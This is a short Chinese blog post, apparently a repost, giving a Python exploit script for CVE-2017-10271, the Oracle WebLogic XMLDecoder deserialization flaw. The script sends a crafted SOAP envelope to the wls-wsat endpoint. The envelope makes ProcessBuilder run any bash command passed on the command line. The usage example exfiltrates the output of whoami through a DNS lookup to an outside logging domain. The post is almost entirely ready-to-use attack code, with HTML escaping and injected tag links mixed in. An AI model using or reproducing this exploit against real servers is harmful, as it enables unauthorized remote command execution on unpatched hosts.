文章作者:莫须有
命令格式:python3 CVE-2017-10271.py url command
eg:python3 CVE-2017-10271.py http://test.cve “ping \`whoami\`.dnslog.cve

# -*- coding: UTF-8 -*-

'''
Created on 2017年12月23日

@author: 莫须有

<a target="_blank" href="https://www.hedysx.com/tag/cve-2017-10271" title="View all posts in CVE-2017-10271">CVE-2017-10271</a> EXP

'''

import requests,sys

headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
    'Content-Type':'text/xml'
}

console = '''&lt;soapenv:Envelope xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;
 &lt;soapenv:Header&gt;
 &lt;work:WorkContext xmlns:work=&quot;http://bea.com/2004/06/soap/workarea/&quot;&gt;
 &lt;java version=&quot;1.8.0_131&quot; class=&quot;java.beans.XMLDecoder&quot;&gt;
 &lt;void class=&quot;java.lang.ProcessBuilder&quot;&gt;
 &lt;array class=&quot;java.lang.String&quot; length=&quot;3&quot;&gt;
 &lt;void index=&quot;0&quot;&gt;
 &lt;string&gt;/bin/bash&lt;/string&gt;
 &lt;/void&gt;
 &lt;void index=&quot;1&quot;&gt;
 &lt;string&gt;-c&lt;/string&gt;
 &lt;/void&gt;
 &lt;void index=&quot;2&quot;&gt;
 &lt;string&gt;%s&lt;/string&gt;
 &lt;/void&gt;
 &lt;/array&gt;
 &lt;void method=&quot;start&quot;/&gt;&lt;/void&gt;
 &lt;/java&gt;
 &lt;/work:WorkContext&gt;
 &lt;/soapenv:Header&gt;
 &lt;soapenv:Body/&gt;
&lt;/soapenv:Envelope&gt;'''

help = '''
<a target="_blank" href="https://www.hedysx.com/tag/cve-2017-10271" title="View all posts in CVE-2017-10271">CVE-2017-10271</a>.py url command
eg:<a target="_blank" href="https://www.hedysx.com/tag/cve-2017-10271" title="View all posts in CVE-2017-10271">CVE-2017-10271</a>.py http://test.cve &quot;ping \`whoami\`.dnslog.cve&quot;'''

if(len(sys.argv)&lt;3):
    print(help)
    exit()

url = sys.argv[1] + '/wls-wsat/CoordinatorPortType?wsdl'
command = sys.argv[2]

print(command)
try:
    req = requests.post(url, headers = headers, timeout=5, data = console % command)
    if('&lt;faultcode&gt;S:Server&lt;/faultcode&gt;&lt;faultstring&gt;0&lt;/faultstring&gt;' in req.text):
        print('Success!')
    else:
        print('Fail!')
except:
    print('Error!')